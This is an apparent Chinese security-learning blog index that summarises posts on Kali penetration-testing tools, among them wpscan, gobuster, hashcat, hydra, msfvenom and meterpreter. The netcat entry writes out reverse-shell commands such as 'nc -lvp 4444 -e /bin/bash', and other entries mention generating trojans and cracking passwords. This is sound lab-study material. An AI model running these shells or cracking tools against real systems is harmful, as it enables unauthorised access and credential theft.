随笔分类 - 工具备忘录
先从脚本小子做起
摘要:在做Windows靶机时,一般靶机开放着3389端口,Linux中有很多工具,这里总结一下经常使用的,这里会使用到三个工具 rdesktop xfreerdp remmina rdekstop 在kali中自带这个命令,如果没有可以使用apt install rdesktop安装。 常用的连接命令如
阅读全文
摘要:nikto可以对任何web网络服务器进行扫描,nikto可能会发现一下数据: 敏感文件 过时的、易受攻击的服务和程序 常见的服务器和软件配置错误 安装Nikto kali中是自带的 sudo apt install nikto 使用Nikto 常用的一共两个参数: -h : 指定目标IP -p :
阅读全文
摘要:wpscan工具是专门针对于wordpress站点的漏洞扫描工具,支持漏洞扫描、指纹识别、插件扫描、主题扫描、用户扫描、用户爆破等常用方法 一般在kali中自带,也可以自己安装sudo apt install wpscan,首次使用可以使用wpscan --update更新该工具最新的漏洞库和指纹信
阅读全文
摘要:Gobuster工具可以对Web目录和dns域、子域进行枚举,功能较为强大 在kali中直接安装 sudo apt install gobuster 一些常见的参数 参数 详细 描述 -t --thread 设置线程(默认10) -v --verbose 详细输出 -z --no-progress
阅读全文
摘要:Tcpdump 是一个常用的网络数据包抓取工具,可以在 Linux/Unix 和其他类 Unix 操作系统中使用。它可以嗅探网络接口上的数据包,并将它们写入文件或输出到屏幕上。以下是 tcpdump 的基本使用教程: 命令格式: tcpdump [选项] [表达式] 常用选项: -i:指定抓取数据包
阅读全文
摘要:平常对敏感文件的备份,都是对文件复制进行备份,今天学习到了如何对磁盘进行备份,在进行取证或者是系统错误恢复时,需要使用到磁盘的备份。 磁盘备份和文件备份的区别: 磁盘备份是将整个存储设备(通常是硬盘)的所有内容复制到另一个目标设备上的过程。这种方法可以一次性备份所有文件和系统设置,包括操作系统、应用
阅读全文
摘要:在平常使用nc只会反弹shell,和文件传输,这里学到一些其他的使用方法记录一下 反弹shell # 反弹shell nc -lvp 4444 -e /bin/bash nc -nv target_ip target_port # 常用的反弹shell nc -lvp 4444 nc -nv att
阅读全文
摘要:首先我是在淘宝上买的免驱动的无线网卡,插上一般可以直接使用,不过买回来发现无法连接一些wifi,是wifi除了满格信号,就是没有信号黑色的。 我还以为这个wifi信号怎么这么差,联系客服发现是最新的kali需要安装一个软件包realtek-rtl8188eus-dkms 淘宝客服的教程:kali单频
阅读全文
摘要:之前在处理Linux标准输出返回结果的时候,有很多凌乱的返回结果,看着很不顺眼,这次学习并总结一些相关的操作 使用grep进行筛选 在查看一些比较大的文件或者执行命令返回结果较长的时候,可以使用grep筛选出需要行的信息,grep命令常用的参数如下: 参数 作用 -i 忽略大小写 -n 显示匹配结果
阅读全文
摘要:安装vmware 首先就是下载VMware客户端了,Vmware是收费的,过好大多数都有破解版,或者激活码 这里我是用的是VMware16,下载在网上搜一下就有,例如 下载解压后里面有一个后缀为exe的安装程序,运行程序进行安装vmware 稍等片刻,进入安装向导界面 选择安装路径,也可以默认 最后
阅读全文
摘要:暴力破解压缩包密码工具kali中fcarck和windows ARCHPR的使用 fcrack fcrack 是kali中自带的压缩包密码破解工具,如果没有可以apt install fcrack安装 参数 作用 -b 暴力破解方式 -D 字典 字典破解方式 -c 暴力破解的字符类型,1=1~9,a
阅读全文
摘要:官网简介:Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 官网:https://vulhub.org/ github:https://github.com
阅读全文
摘要:john类似于hashcat一样,也是一款密码破解方式,john跟专注于系统密码的破解,并且和hashcat一样在kali中自带 hash请见hash的简单使用 识别Hash类型 john会自动识别需要破解的hash,但是很多时候会识别错误,这不用担心,我们使用专门识别hash类型的工具hash-i
阅读全文
摘要:在我们抓取到系统的hash值之后,需要通过一些工具来破解密码 hashcat是一款可以基于显卡暴力破解密码的工具,几乎支持了所有常见的加密,并且支持各种姿势的密码搭配 在kali Linux中自带的有,也支持Windows Mac平台,可以在官网下载:https://hashcat.net 得到一个
阅读全文
摘要:在对Web网站进行审计时,首先我们会对进场出现的/admin和robots.txt等信息和目录进行初步的审计获取重要的信息,但是手动猜测目录过于缓慢,使用工具能够迅速的爆破出目录 目录爆破取决于字典的强大,和高性能的机器。 御剑 下载地址:https://github.com/foryujian/y
阅读全文
摘要:volatility 简介: volatility(挖楼推了推) 是一个开源的框架,能够对导出的内存镜像进行分析,能够通过获取内核的数据结构,使用插件获取内存的详细情况和运行状态,同时可以直接dump系统文件,屏幕截图,查看进程。 官网下载地址:https://www.volatilityfound
阅读全文
摘要:msfvenom也只metasploit中的一个很强的工具,msfvenom生成木马非常的迅速可以各种版本的木马 该工具由msfpaylod和msfencodes的组成 生成木马是需要在本地监听,等待木马上线即可。该步骤在meterpretr的使用有使用到 命令 这里我们主要讲解msfvenom的命
阅读全文
摘要:meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 场景布置 生成木马 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter msfvenom -p win
阅读全文
摘要:msfconsole是metasploit中的一个工具; msfconsole集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具 在终端输入msfconsole命令即可进入msf的控制台,msf控制台集成了很多其他程序接口,例如nmap,sqlmap可以在msf控制台中使用 可以看到每个分
阅读全文
摘要:Hydra 在爆破工具中,hydra可是数一数二的存在,是著名黑客组织thc开发的一款开源的暴力密码破解工具,可以在线破解多种密码 Hydra 能够暴力破解以下协议:Asterisk、AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、HTT
阅读全文
